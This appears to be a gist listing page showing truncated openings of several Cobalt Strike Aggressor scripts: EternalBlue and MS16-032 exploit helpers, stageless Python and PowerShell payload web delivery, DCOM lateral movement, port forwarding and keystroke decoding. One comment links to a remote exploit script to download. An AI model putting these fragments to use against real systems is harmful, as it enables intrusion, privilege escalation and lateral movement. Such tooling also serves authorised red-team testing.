View safedelete.cna
#
# safe delete in file browser right-click menu
#
popup_clear("filebrowser");
popup filebrowser {
item "&Download" {
local('$file');
foreach $file ($3) {
bdownload($1, "$2 $+ \\ $+ $file");
View eternalblue.cna
#
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
#
# target, listener, where to save .rc file
sub generate_rc_file {
local('$target $listener $where $handle $shellcode');
($target, $listener, $where) = @_;
View stagelesspython.cna
# Python Stageless Scripted Web Delivery
# setup our stageless Python Web Delivery attack
sub setup_attack {
local('%options $x86payload $x64payload $url $script');
%options = $3;
# generate our stageless x86 payload
artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
yield;
View tokenToEmail.cna
#
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
#
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html
#
# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
local('$out $now $method $uri $addr $ua $response $size $handler $when $params');
View stagelessweb.cna
# Scripted Web Delivery (Stageless)
#
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.
# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
local('%options $script $url $arch');
%options = $3;
# get the arch right.
View comexec.cna
# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
"Synopsis: com-exec [target] [listener]\n\n" .
"Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
View portfwd.cna
#
# port foreward alias in Beacon and SSH
#
# pull common code into a function
sub _portfwd {
if ($2 eq "stop") {
btask($1, "Tasked session to stop forward to $3");
call("beacons.pivot_stop_port", $null, $3);
}
View webkeystrokes.cna
# convert comma separated keystroke values into a string.
sub toString {
local('@temp');
@temp = split(",", $1);
shift(@temp);
return join("", map({
return chr(parseNumber($1, 16, 10));
}, @temp));
}
View ms16-032.cna
# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
#
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
# 1. grab MS16-032.ps1
# https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1
# 2. store it with this script
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack
# logic to run this particular attack
sub exploit {
View oneliner.cna
# host a PowerShell script on a one-off web server via Beacon.
#
# Why? Generate one-liners for length constrained command execution opportunities
#
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
# if there's interest in this capability, I can build an official API for it.
import common.*;
import beacon.*;